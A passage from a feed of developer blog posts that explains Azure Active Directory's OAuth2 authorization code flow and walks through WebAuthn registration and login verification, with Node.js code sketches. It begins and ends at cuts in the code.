grant_type: "authorization_code",&lt;br&gt;
code: authCode,&lt;br&gt;
client_id: process.env.CLIENT_ID,&lt;br&gt;
client_secret: process.env.CLIENT_SECRET,&lt;br&gt;
redirect_uri: process.env.BASE_URL + process.env.REDIRECT_URL&lt;br&gt;
}&lt;br&gt;
};&lt;br&gt;
request(options, function (error, response, body) {&lt;br&gt;
if (error) throw new Error(error);&lt;br&gt;
try {&lt;br&gt;
const json = JSON.parse(body);&lt;br&gt;
if (json.error) res.status(500).send("Error occurred: " + json.error + "\n" + json.error_description);&lt;br&gt;
else {&lt;br&gt;
res.send(json.access_token);&lt;br&gt;
}&lt;br&gt;
}&lt;br&gt;
catch (e) {&lt;br&gt;
res.status(500).send("The token request did not return JSON. Instead: \n" + body);&lt;br&gt;
}&lt;br&gt;
});&lt;br&gt;
});&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;The POST call again has a few mandatory parameters that we have to provide to get the Bearer token.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;url&lt;/code&gt;: Similar to the first call, we can use either our tenant or the &lt;code&gt;common&lt;/code&gt; endpoint, and we can specify v1.0 or v2.0. The URL has to match the one from the first call.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;grant_type&lt;/code&gt;: Used to specify which kind of grant should be given back, must be &lt;code&gt;authorization_code&lt;/code&gt; to get a Bearer token. You can look up the different grants &lt;a href="https://oauth.net/2/grant-types/"&gt;here&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;code&lt;/code&gt;: Our access code we got from our previous call.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;client_id&lt;/code&gt;: The ID of our app registered in Azure Active Directory.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;client_secret&lt;/code&gt;: A secret given out by Azure Active Directory used to prove that you are the developer of the app.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;redirect_uri&lt;/code&gt;: Usually just the current url, as this is the redirect_uri you have specified in your last call and in AAD.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;After we execute our POST call, we get an answer from Active Directory containing a JSON object that holds the Bearer token in its parameters. If an error occurred, the JSON object instead has an error attribute containing an error message.&lt;/p&gt;

&lt;p&gt;Now you have everything to authenticate your users and start working with their Microsoft profiles to build apps based on the Microsoft ecosystem. For example, if you gave your app the scope &lt;code&gt;user.read&lt;/code&gt;, you can now do a GET request to Microsoft Graph to get the user's profile information.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;app.get("/me", (req,res) =&amp;gt; {&lt;br&gt;
const options = {&lt;br&gt;
method: "GET",&lt;br&gt;
url: "https://graph.microsoft.com/v1.0/me/",&lt;br&gt;
headers: {&lt;br&gt;
Authorization: "Bearer *your-token*"&lt;br&gt;
}&lt;br&gt;
};&lt;br&gt;
request(options, function (error, response, body) {&lt;br&gt;
res.send(body);&lt;br&gt;
})&lt;br&gt;
})&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;You can find the whole code (documented) &lt;a href="https://github.com/Urmade/AzureActiveDirectoryNodeJSLogin"&gt;here&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>identity</category>
      <category>azure</category>
      <category>webdev</category>
      <category>tutorial</category>
    </item>
    <item>
      <title>The (theoretical) beginners guide to Azure Active Directory</title>
      <dc:creator>Tobias Urban</dc:creator>
      <pubDate>Thu, 17 Oct 2019 17:42:31 +0000</pubDate>
      <link>https://forem.com/urmade/the-theoretical-beginners-guide-to-azure-active-directory-1f5m</link>
      <guid>https://forem.com/urmade/the-theoretical-beginners-guide-to-azure-active-directory-1f5m</guid>
<description>&lt;p&gt;When I started to develop my first small applications, I usually wasn’t too concerned about security and about how to keep user data safe from exposure. But the deeper I dug into developing apps, the more I realized how hard it is to design a truly secure way to store sensitive personal data. So I looked for third-party software that could solve this problem for me.&lt;/p&gt;

&lt;p&gt;If you’re searching for identity management providers, one of the first platforms you will find is Active Directory (AD), a tool developed by Microsoft that was first launched in 1999 and has since evolved into the leading Identity and Access Management (IAM) software for enterprises. But although this makes Active Directory a very important skill for software engineers to cover, it also means that the software has to cover a lot of different use cases, making it seem very complex at the start. Therefore I hope to make your start with Active Directory a joy by sharing a walk-through tutorial of the login flow (written in Node.js) and by explaining the underlying concepts of Active Directory in the process.&lt;/p&gt;

&lt;p&gt;TL;DR: Is this tutorial suitable for me? Ask yourself these questions:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Do I want to understand how an IAM software works?&lt;/li&gt;
&lt;li&gt;Do I want to explore different Azure Active Directory versions and how they differ?&lt;/li&gt;
&lt;li&gt;Do I want to build a login mechanism with Azure Active Directory?&lt;/li&gt;
&lt;li&gt;Do I want to learn more about OAuth2?&lt;/li&gt;
&lt;li&gt;Do I want to learn how to secure my users' sensitive data?&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;If you can answer any of those questions with “Yes”, this is your tutorial. We will cover the following topics:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;What and why is Active Directory&lt;/li&gt;
&lt;li&gt;The developers opportunity&lt;/li&gt;
&lt;li&gt;Active Directory for everyone with AAD B2C&lt;/li&gt;
&lt;li&gt;OAuth2 in a nutshell&lt;/li&gt;
&lt;li&gt;Where to learn more&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;This tutorial is separated into two articles: A theoretical introduction to Azure Active Directory (You are here) and a hands-on walk-through. You can find an implementation of how to log your user in with Azure Active Directory &lt;a href="https://github.com/Urmade/AzureActiveDirectoryNodeJSLogin"&gt;in this GitHub repository&lt;/a&gt;.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  What and why is Active Directory
&lt;/h2&gt;

&lt;p&gt;So before we start working with Active Directory, we should understand what exactly AD actually is. Basically, AD stores all kinds of entity information in an organization. That could be, for example, data about users, groups, devices, organizations or permissions between those entities. So it is far more than just a pure user management platform, although in this tutorial we will only focus on the user management features.&lt;br&gt;
Historically, Active Directory was an On-Premise solution, meaning that every company using this technology had it installed in their own datacenters, completely isolated from all other Active Directories out there. After some time solutions were provided to connect two specific Active Directory tenants with each other, so that the employees from Company A could for example get access to devices of Company B and vice versa. &lt;/p&gt;

&lt;p&gt;With the rise of cloud and Microsoft Azure specifically a new form of AD was provided: Azure Active Directory. Here, all Active Directories are connected with each other, meaning that someone from Company A could for example access an application developed internally at Company B if Company B allows that option in their application (more on how to handle that in the Coding section). This eliminates a lot of configuration overhead and makes it far easier to develop B2B applications as the app developed in your AD tenant can now be accessed by either individual users of another company or can register in the AD tenant of your customer (if you’re interested in that, you can dig deeper into &lt;a href="https://docs.microsoft.com/en-us/azure/active-directory/develop/v2-permissions-and-consent#scopes-and-permissions"&gt;AD scopes&lt;/a&gt; and &lt;a href="https://docs.microsoft.com/en-us/azure/active-directory/develop/v2-permissions-and-consent#permission-types"&gt;delegated vs app permissions&lt;/a&gt;). &lt;/p&gt;

&lt;p&gt;Active Directory tenants that are hosted on-premise, meaning not in Azure, are not accessible by Azure by default but can also connect to the Azure Active Directory via Azure AD Connect to replicate their user data to Azure Active Directory.&lt;/p&gt;

&lt;h2&gt;
  
  
  The developers opportunity
&lt;/h2&gt;

&lt;p&gt;Coming from its long history and its deep integration with the Microsoft ecosystem, Active Directory became the de-facto standard for identity management in companies. And even though on-premise identity management isn't in its prime anymore, a lot of companies stayed with what they know and migrated directly to Azure Active Directory. There are also a lot of reasons to do so even nowadays: Office 365, Dynamics 365 and Azure (the "three clouds" of Microsoft) all work with Azure Active Directory. So whenever you want to use the cloud-hosted Office, you will need an Azure Active Directory account. Also, every user with a Microsoft account (for example someone who uses Outlook or has an Xbox account) is using Azure Active Directory under the hood. &lt;/p&gt;

&lt;p&gt;This makes AAD a huge deal for developers. Especially if you develop an application for the enterprise sector, you often have to argue over how to access data and store user information. By integrating your application into Azure Active Directory, you don't have to store any personal user data (e.g. names), your users get a seamless single-sign-on experience, and your customers' admins still have control over which users and which data your app can reach. This spares you a lot of user management development effort and makes user adoption a lot easier. &lt;/p&gt;

&lt;h2&gt;
  
  
  Active Directory for everyone with AAD B2C
&lt;/h2&gt;

&lt;p&gt;Active Directory was originally a B2B product, designed for companies to handle their internal resources. As more and more companies developed complex B2C apps, a new branch of Active Directory was released: Azure Active Directory B2C. While this version was downsized in terms of user micro-management as well as in its capability to handle resources like devices, rooms and organizations, it came with a lot more features to handle a massive, anonymous user base, like self-registration into the Active Directory via e.g. Facebook, Google, email or LinkedIn, and advanced features to store custom user metadata. &lt;/p&gt;

&lt;p&gt;Furthermore, a new version of the Active Directory login API was released, making it possible to authenticate personal Microsoft accounts (e.g. Outlook or MSN email addresses) into Active Directory applications. Therefore there are currently two options to develop B2C apps with Active Directory: You could use the traditional Azure Active Directory and allow users to log in from any domain (including the public Microsoft Active Directory that holds all @live.com, @outlook.com,... users). Or you use Azure Active Directory B2C to build your own Active Directory instance which holds all the users of your app. This approach offers additional benefits, like expanding AD with custom metadata and making it possible for people without a Microsoft account to use your app.&lt;/p&gt;

&lt;h2&gt;
  
  
  OAuth2 in a nutshell
&lt;/h2&gt;

&lt;p&gt;Now that we know a lot more about the "What" of Active Directory, we want to look into the "How". Specifically, how can we authenticate into Azure Active Directory (AAD).&lt;/p&gt;

&lt;p&gt;AAD uses the &lt;a href="https://openid.net/connect/"&gt;OpenID Connect specification&lt;/a&gt; to handle the sign-in process of its users. OpenID Connect is an extension to &lt;a href="https://tools.ietf.org/html/rfc6749"&gt;OAuth 2.0&lt;/a&gt;, which was built to standardize identity verification across systems. OAuth 2.0 only specifies the &lt;em&gt;Authorization&lt;/em&gt; of users, meaning: How can a user prove that they are allowed to do what they want to do? Although this is a crucial step in securing web apps from malicious access, it still doesn't answer the question: Who is the person that wants to access my app? OpenID Connect was therefore written to take care of the &lt;em&gt;Authentication&lt;/em&gt; of users. As OpenID Connect (OIDC in short) builds on OAuth 2.0, every system that implements OIDC also implements OAuth 2.0.&lt;/p&gt;

&lt;p&gt;The good thing is: We don't have to implement the Authentication part ourselves when we start with AAD. Although it is a good idea to think about Authentication more deeply in production apps, the core logic of signing users in and looking up who they are is handled by Azure Active Directory for us. We only have to take care of the Authorization of our users, i.e. getting permission to do something with their data.&lt;/p&gt;

&lt;p&gt;OAuth2.0 offers a variety of possibilities to authorize your users. The most intuitive one (and the most common for Web Apps) is the &lt;a href="https://docs.microsoft.com/en-us/azure/active-directory/develop/v2-oauth2-auth-code-flow"&gt;authorization code flow&lt;/a&gt;. This flow has two steps: In step 1, you redirect your user to a Microsoft-hosted login page, where users can log in with their username/e-mail and password. When the login was successful, we enter step 2: Azure Active Directory sends an authorization code to your application. You now have proof that your user is signed in, and you can trade this authorization code for a so-called &lt;a href="https://jwt.io/"&gt;JSON Web Token&lt;/a&gt; (JWT). That JWT can then be used to query services like the Microsoft Graph or Azure Active Directory to receive and manipulate data on behalf of the user that signed in. &lt;/p&gt;
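
&lt;p&gt;To get a feeling for what such a JWT looks like, here is a small sketch that decodes the payload of a token. The token itself is fabricated just for this demo; note that this only inspects the claims and does &lt;em&gt;not&lt;/em&gt; verify the signature:&lt;/p&gt;

```javascript
// Sketch: a JWT is three base64url-encoded segments (header.payload.signature).
// Decoding the middle segment reveals the claims; signature verification is a
// separate step that a real app must not skip.
function decodeJwtPayload(jwt) {
  const payload = jwt.split(".")[1];
  return JSON.parse(Buffer.from(payload, "base64url").toString("utf8"));
}

// A hypothetical token built only for this demo:
const demoToken = [
  Buffer.from(JSON.stringify({ alg: "RS256", typ: "JWT" })).toString("base64url"),
  Buffer.from(JSON.stringify({ name: "Jane Doe", scp: "user.read" })).toString("base64url"),
  "fake-signature"
].join(".");

console.log(decodeJwtPayload(demoToken).scp); // "user.read"
```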

&lt;h2&gt;
  
  
  Where to learn more?
&lt;/h2&gt;

&lt;p&gt;If you want to go into the technical how of this concept, you can check out &lt;a href=""&gt;this article&lt;/a&gt; that walks you through an implementation of the authorization code flow.&lt;/p&gt;

&lt;p&gt;If you already have an existing AAD integration, there is another exciting offer you can use. Microsoft offers a dedicated store just for AAD-integrated apps where you can promote your app completely free of charge. To get started, take a look at the &lt;a href="https://docs.microsoft.com/en-us/azure/active-directory/develop/howto-app-gallery-listing"&gt;official documentation&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>identity</category>
      <category>azure</category>
      <category>webdev</category>
      <category>azureactivedirectory</category>
    </item>
    <item>
      <title>Getting started with WebAuthn - The basic flow</title>
      <dc:creator>Tobias Urban</dc:creator>
      <pubDate>Sat, 12 Oct 2019 08:08:49 +0000</pubDate>
      <link>https://forem.com/urmade/getting-started-with-webauthn-the-basic-flow-45jd</link>
      <guid>https://forem.com/urmade/getting-started-with-webauthn-the-basic-flow-45jd</guid>
      <description>&lt;h1&gt;
  
  
  New to WebAuthn?
&lt;/h1&gt;

&lt;p&gt;If you have never heard of the WebAuthentication standard before, let me tell you something: It's awesome! I've written a &lt;a href="https://dev.to/urmade/building-towards-a-web-without-passwords-lc1"&gt;blog article&lt;/a&gt; that explains what WebAuthn is and why you should definitely use it. I recommend checking that out first and then coming back for the technical parts.&lt;/p&gt;

&lt;h2&gt;
  
  
  What will be covered in this article?
&lt;/h2&gt;

&lt;p&gt;This article is meant as a first introduction to how to implement WebAuthn yourself. It won't cover each required method step by step (although an article about that is currently in the works), but it will walk you through all necessary steps to implement the specification. Here's what you can expect:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;What is the basic (developers) idea of WebAuthn&lt;/li&gt;
&lt;li&gt;
Registering a new user

&lt;ol&gt;
&lt;li&gt;Step 1: The Client&lt;/li&gt;
&lt;li&gt;Step 2: The Server&lt;/li&gt;
&lt;/ol&gt;


&lt;/li&gt;
&lt;li&gt;
Validating a login request

&lt;ol&gt;
&lt;li&gt;Step 1: The Client&lt;/li&gt;
&lt;li&gt;Step 2: The Server&lt;/li&gt;
&lt;/ol&gt;


&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  What is the basic (developers) idea of WebAuthn?
&lt;/h2&gt;

&lt;p&gt;From a web developer's view, WebAuthn is actually quite straight-forward and only offers two functionalities: Signing up a new user and logging in an existing user. For both of these functions, it offers a method under &lt;code&gt;navigator.credentials&lt;/code&gt;: &lt;code&gt;navigator.credentials.create()&lt;/code&gt; and &lt;code&gt;navigator.credentials.get()&lt;/code&gt;. The credentials API also offers the methods &lt;code&gt;navigator.credentials.preventSilentAccess()&lt;/code&gt;, which toggles the auto sign-on capabilities for your application, and &lt;code&gt;navigator.credentials.store()&lt;/code&gt;, which is meant to persist any credential (e.g. username/password) to the browser. Neither of these last two methods is part of the WebAuthn standard.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;The WebAuthn specification was not yet implemented in all browsers at the time this article was published. &lt;a href="https://developer.mozilla.org/en-US/docs/Web/API/Navigator/credentials"&gt;Check availability&lt;/a&gt; to learn more.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Implementing WebAuthn always requires a client (e.g. a browser) and a server (or, in specification terms, &lt;em&gt;Relying Party&lt;/em&gt;). On the client-side, you have to provide some options (we will look into these later) to call &lt;code&gt;create()&lt;/code&gt; and &lt;code&gt;get()&lt;/code&gt;, which will then provide you a &lt;a href="https://w3c.github.io/webauthn/#iface-pkcredential"&gt;PublicKeyCredential&lt;/a&gt;. This credential contains different data depending on if you have created a new credential or requested an existing credential. The credential is delivered in a secure context by most clients, meaning it is only handed out over HTTPS and its attributes cannot be directly sent to a server. That wouldn't be a good idea anyways, as the credential object contains a wild mixture of strings and byte arrays. &lt;/p&gt;

&lt;h2&gt;
  
  
  Registering a new user
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Step 1: Client-side signup
&lt;/h3&gt;

&lt;p&gt;So let's get into the actual doing. Registering a new user starts on the client. Calling &lt;code&gt;navigator.credentials.create()&lt;/code&gt; will push a dialog to the user, prompting them to choose an authentication method and to use that method to verify themselves. But before doing this, we have to configure the so-called &lt;a href="https://w3c.github.io/webauthn/#dictdef-publickeycredentialcreationoptions"&gt;PublicKeyCredentialCreationOptions&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;The CreationOptions consist of multiple pieces of information. These are:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The ID of your app (namely the URL on which your app is reachable)&lt;/li&gt;
&lt;li&gt;The ID, name and username of the current user (the latter two will be shown to the user when they sign in)&lt;/li&gt;
&lt;li&gt;A server-side challenge that you can use to ensure this request is actually meant for your app&lt;/li&gt;
&lt;li&gt;A list of allowed public key creation options (depending on which algorithms you allow for public key creation some providers will / won't work)&lt;/li&gt;
&lt;li&gt;A timeout value in milliseconds&lt;/li&gt;
&lt;li&gt;A list of credentials that are not allowed to be created again (basically a security measure to prohibit users creating multiple accounts on the same device)&lt;/li&gt;
&lt;li&gt;Additional data specifying which requirements an authenticator (e.g. Windows Hello, Touch ID) has to fulfill to be eligible to create a credential&lt;/li&gt;
&lt;li&gt;An indication if you wish to also get data about the authenticator and not only the new user credential&lt;/li&gt;
&lt;li&gt;Extensions: Basically every key-value pair you want to include, can be used for information encoding of all sorts&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;After calling &lt;code&gt;navigator.credentials.create()&lt;/code&gt; with these options set, you will receive an &lt;a href="https://w3c.github.io/webauthn/#authenticatorattestationresponse"&gt;Authenticator Attestation Response&lt;/a&gt; which also implements the &lt;a href="https://w3c.github.io/webappsec-credential-management/#credential"&gt;Credential&lt;/a&gt; interface (yep, the specification loves long object names). So basically you get a credential with a credential ID and a type (in the W3C spec this field indicates the operation you performed, namely webauthn.create or webauthn.get), some client data (like the URL at which the credential was created, and your original challenge), and an attestation object. This is a byte sequence, so literally just a list of zeros and ones. This byte array contains all credential-relevant data: The public key, (again) the credential ID and some other cryptographically relevant information.&lt;/p&gt;

&lt;p&gt;Before you can send this credential object to your server for further operations, you have to encode the information contained in the credential into a string that you can then decode again at your server side. You should send all available data in the credential object to your server, as every attribute has some necessity for the validation of the credentials later on.&lt;/p&gt;
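
&lt;p&gt;One common way to do this encoding is base64url. A minimal sketch using Node's &lt;code&gt;Buffer&lt;/code&gt; (in the browser you would use a small helper around &lt;code&gt;btoa&lt;/code&gt;/&lt;code&gt;atob&lt;/code&gt; instead, since &lt;code&gt;Buffer&lt;/code&gt; is Node-specific):&lt;/p&gt;

```javascript
// Sketch: credential fields arrive as byte arrays; to POST them to the server
// they must be turned into strings. base64url round-trips them losslessly.
function bufferToBase64url(buf) {
  return Buffer.from(buf).toString("base64url");
}
function base64urlToBuffer(str) {
  return new Uint8Array(Buffer.from(str, "base64url"));
}

// Round-trip a fake credential ID:
const rawId = new Uint8Array([1, 2, 3, 250]);
const wire = bufferToBase64url(rawId); // safe to put in a JSON request body
const back = base64urlToBuffer(wire);
```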

&lt;h3&gt;
  
  
  Step 2: Server-side signup
&lt;/h3&gt;

&lt;p&gt;Once you've sent the data to your server, the specification puts a lot of verification steps in place to make sure you are dealing with a legitimate request. Your first job is to verify that the source of the request is legitimate.&lt;/p&gt;

&lt;p&gt;To do so, we got the &lt;a href="https://w3c.github.io/webauthn/#dom-authenticatorresponse-clientdatajson"&gt;clientDataJSON&lt;/a&gt; that contains all source-relevant information. As this is only a stringified JSON by the time your server receives it, you just have to parse it and are ready to go. &lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Its &lt;code&gt;type&lt;/code&gt; field indicates for which operation this credential was actually issued, so you have to make sure that field is set to "webauthn.create". &lt;/li&gt;
&lt;li&gt;You then must verify that your server has actually issued the &lt;code&gt;challenge&lt;/code&gt; that is included in the clientData. The challenge is a random string that your server issues whenever some user (automatically) creates new CreationOptions to sign up for your service.&lt;/li&gt;
&lt;li&gt;Make sure that the URL that issued this credential is actually the URL you would expect to do this. E.g. if your app runs on "&lt;a href="https://www.awesomeapp.com"&gt;https://www.awesomeapp.com&lt;/a&gt;" and the &lt;code&gt;origin&lt;/code&gt; of the clientData is "&lt;a href="http://phishy.scamsite.to"&gt;http://phishy.scamsite.to&lt;/a&gt;", you would probably want to cancel the request.&lt;/li&gt;
&lt;li&gt;Some clients will also send you a &lt;code&gt;tokenBinding&lt;/code&gt;. This attribute contains information about the TLS connection over which you got your credential, and can be used to validate a secure transfer from the client to your server. &lt;/li&gt;
&lt;/ol&gt;
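
&lt;p&gt;The checks above can be sketched as follows. The expected origin and the store of issued challenges are assumptions for this demo; a real server would keep challenges with an expiry and remove them once used:&lt;/p&gt;

```javascript
// Sketch of the clientDataJSON checks: operation type, known challenge,
// expected origin. tokenBinding checks would slot in at the marked spot.
function verifyClientData(clientDataJSON, issuedChallenges) {
  const clientData = JSON.parse(clientDataJSON);
  if (clientData.type !== "webauthn.create")
    throw new Error("Wrong operation: " + clientData.type);
  if (!issuedChallenges.has(clientData.challenge))
    throw new Error("Unknown challenge");
  if (clientData.origin !== "https://www.awesomeapp.com") // assumed origin
    throw new Error("Unexpected origin: " + clientData.origin);
  // clientData.tokenBinding, if present, could be validated here as well.
  return clientData;
}

const challenges = new Set(["random-challenge-123"]); // demo challenge store
const ok = verifyClientData(JSON.stringify({
  type: "webauthn.create",
  challenge: "random-challenge-123",
  origin: "https://www.awesomeapp.com"
}), challenges);
```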

&lt;p&gt;After you are done with this, you can be pretty sure the request was issued by a legit source. So we can move on to the actually interesting part - the validation of the credential we just received. To do this, we have to decode first the &lt;a href="https://w3c.github.io/webauthn/#dom-authenticatorattestationresponse-attestationobject"&gt;attestation&lt;/a&gt; and then the &lt;a href="https://w3c.github.io/webauthn/#authenticator-data"&gt;authenticatorData&lt;/a&gt;. &lt;/p&gt;

&lt;p&gt;The attestation is a CBOR encoded byte array that tells you all you need to know about how the credential was issued as well as the credential itself. This is also the part where it starts getting tricky. Every authenticator can specify their own attestation, and with that the data contained as well as the validation process are completely different. By now, this led to six different &lt;a href="https://w3c.github.io/webauthn/#sctn-defined-attestation-formats"&gt;Attestation Statement Formats&lt;/a&gt; - they vary in their data content, their verification methods and even in the format in which the verification relevant data is issued.&lt;/p&gt;

&lt;p&gt;We also get the authenticatorData. Here we find the credential itself, information about the circumstances under which the credential was created, and an encrypted version of the Relying Party ID that we specified at creation time in the client.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;To get things started, we first decode the attestation and the included authenticatorData. The attestation is CBOR-encoded and requires a CBOR parser; the authenticatorData can be parsed byte by byte, as the specification clearly defines which byte carries which information.&lt;/li&gt;
&lt;li&gt;We then verify that the relying party that issued this credential is really us. To do so, we hash our relying party ID with the SHA-256 algorithm and compare it to the &lt;code&gt;rpIdHash&lt;/code&gt; - if the two are identical, everything is okay.&lt;/li&gt;
&lt;li&gt;We then take care of the &lt;code&gt;flags&lt;/code&gt; - binary values which describe the checks that were done before the credential was issued. We have one flag for &lt;code&gt;userPresent&lt;/code&gt;. This indicates if the presence of the user was verified by showing at least one popup that the user actively clicked before the credential was created. Another flag stands for &lt;code&gt;userVerified&lt;/code&gt;, indicating if the user has passed the check of the authenticator (for example provided a matching fingerprint). The server can decide whether or not to stop the process if one of these flags is false. In the scenario of sign-up, there are very limited use cases where a valid request didn't check for the user presence or their validity, so you should enforce a strict checking (as we see later in the verify section, there are use cases where users don't have to be present in order to log in).&lt;/li&gt;
&lt;li&gt;Now we check if the public key was created with an algorithm that we allowed in the creationOptions. To do so, we can take the &lt;code&gt;credentialPublicKey.kty&lt;/code&gt; value and check it against a list of allowed algorithms we specified beforehand.&lt;/li&gt;
&lt;li&gt;We also have to make sure we didn't receive any unwanted extensions. To do so, we look through the &lt;code&gt;extensions&lt;/code&gt; attribute and compare all extensions to a list of white-labeled extensions that we want in our credential. This is also a good time to process the extensions you specified.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Now comes the fun part: We are done with verifying the context and can now start to verify the attestation itself. To do so, we have six different approaches that are all described in the specification. To not double this already huge article even more, I will only describe the general idea here:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;At first, we determine which format our attestation has. We have a &lt;code&gt;fmt&lt;/code&gt; attribute that tells us in a string representation which format the attestationStatement resembles. But it is actually more secure to also go through all attributes of &lt;code&gt;attestationStatement&lt;/code&gt; and check if each attribute that the format specifies is included.&lt;/li&gt;
&lt;li&gt;The attestation contains a signature. This is the unique proof that an authenticator really is what it claims to be, and every authenticator format has its own method to validate this signature.&lt;/li&gt;
&lt;li&gt;The attestationStatement also contains an &lt;code&gt;AAGUID&lt;/code&gt;(authenticator ID). You can use this ID to make a call to an external, trustworthy service (like FIDO) and if the ID matches their record, they will return a certificate or public key back to you (called a trust anchor). This can be used to determine if the authenticator is who they claim to be.&lt;/li&gt;
&lt;li&gt;The attestation formats use different methods to encrypt their data. You now should use the trust anchor to validate the trustworthiness of the attestation.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;If you made it this far, you actually did it: You made absolutely sure that the request was legit and that there is an actual user who wants to use your service and sign up for it. All you have left to do now is to store the user's credentials in your database.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;First, check if the credential ID is already in use. If there already is a record for this ID in your database, deny the request and indicate that the client should issue a new credential.&lt;/li&gt;
&lt;li&gt;Go ahead and register the new user.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;We made it! We actually registered a user to our database, 100% compliant with all current standards. You could of course just skip steps 1 - 14 (excluding step 5) and save yourself a lot of stress and scripting, but then you couldn't be sure that you are actually operating securely in your app. And as a heads up, validating a login is way easier than signing up a new user!&lt;/p&gt;

&lt;h2&gt;
  
  
  Validating a login request
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Step 1: Client-side validation
&lt;/h3&gt;

&lt;p&gt;Similar to registering a new user, we first have to build up &lt;a href="https://w3c.github.io/webauthn/#dictdef-publickeycredentialrequestoptions"&gt;PublicKeyCredentialRequestOptions&lt;/a&gt;. We don't have to specify as many parameters, though. The necessary information that you need to get a stored user's credentials is:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A server-side challenge that you can use to ensure this request is actually meant for your app&lt;/li&gt;
&lt;li&gt;A timeout value in milliseconds&lt;/li&gt;
&lt;li&gt;The ID of your app (namely the URL on which your app is reachable)&lt;/li&gt;
&lt;li&gt;Additional data specifying which requirements an authenticator (e.g. Windows Hello, Touch ID) has to fulfill to be eligible to provide a credential&lt;/li&gt;
&lt;li&gt;A list of credentials that you would expect to receive (all credential IDs that you have stored about the user)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;After calling &lt;code&gt;navigator.credentials.get()&lt;/code&gt; with these options set, you will receive an &lt;a href="https://w3c.github.io/webauthn/#authenticatorassertionresponse"&gt;Authenticator Assertion Response&lt;/a&gt; which also implements the &lt;a href="https://w3c.github.io/webappsec-credential-management/#credential"&gt;Credential&lt;/a&gt; interface (so, basically the same as when registering a new user). We get the credential ID (as a string and encoded as a byte array), client data (same as when registering a user), authenticator data (a reduced version of what we know from registration), a signature and a userHandle - the ID of the user for which this credential was registered (the latter two are new). We again encode all this information to send it securely to our server.&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 2: Server-side validation
&lt;/h3&gt;

&lt;p&gt;Now that we have all information on our server, the first thing we have to get is our user credential record from our own database. We will need the public key that belongs to that request, so we look up the credential ID in our database. After that, we can do the request origin verification we already know from registering a user. We parse the clientDataJSON and check the following (if any of these sound new to you, go to Registering a new user - Server Part):&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Is the operation (&lt;code&gt;clientData.type&lt;/code&gt;) &lt;em&gt;webauthn.get&lt;/em&gt;?&lt;/li&gt;
&lt;li&gt;Do we recognize the provided challenge?&lt;/li&gt;
&lt;li&gt;Did we expect the request to come from the given origin url?&lt;/li&gt;
&lt;li&gt;Do we have a &lt;code&gt;tokenBinding&lt;/code&gt; object and does it match our expectations regarding the TLS connection?&lt;/li&gt;
&lt;/ul&gt;
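&lt;p&gt;These checks can be sketched on the server side like this. A minimal sketch: &lt;code&gt;expectedChallenge&lt;/code&gt; and &lt;code&gt;expectedOrigin&lt;/code&gt; are hypothetical values your server stored when it issued the login challenge, and the tokenBinding check is only indicated as a comment.&lt;/p&gt;

```javascript
// Minimal sketch of the clientDataJSON checks on the server.
function verifyClientData(clientDataJSONBase64, expectedChallenge, expectedOrigin) {
  const clientData = JSON.parse(
    Buffer.from(clientDataJSONBase64, "base64url").toString("utf8")
  );

  if (clientData.type !== "webauthn.get") {
    throw new Error("Not a login operation");
  }
  if (clientData.challenge !== expectedChallenge) {
    throw new Error("Unknown challenge");
  }
  if (clientData.origin !== expectedOrigin) {
    throw new Error("Unexpected origin");
  }
  // If clientData.tokenBinding is present, its status and id would be
  // checked against the TLS connection here as well.
  return clientData;
}
```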

&lt;p&gt;After this, we can validate the context of the request (again, the same procedure as in the signup process). First we decode the authenticator data from its byte representation, and then we check the following:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Does the Relying Party ID match our expectations?&lt;/li&gt;
&lt;li&gt;Is the user presence flag set?&lt;/li&gt;
&lt;li&gt;Is the user verification flag set?&lt;/li&gt;
&lt;li&gt;Does the request send us any extensions? Did we expect those?&lt;/li&gt;
&lt;/ul&gt;
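&lt;p&gt;Decoding the authenticator data is straightforward, because the WebAuthn specification fixes its byte layout: 32 bytes of Relying Party ID hash, one flags byte (bit 0 is user presence, bit 2 is user verification), then a 4-byte big-endian signCount. A minimal sketch:&lt;/p&gt;

```javascript
// Minimal sketch of decoding the authenticator data byte array.
// Layout per the WebAuthn spec: 32 bytes rpIdHash, 1 byte flags,
// 4 bytes signCount (big-endian); extension data may follow.
function parseAuthenticatorData(authData) {
  const buf = Buffer.from(authData);
  const rpIdHash = buf.subarray(0, 32);
  // Render the flags byte as a bit string; bit 0 is the rightmost character.
  const flagBits = buf[32].toString(2).padStart(8, "0");
  return {
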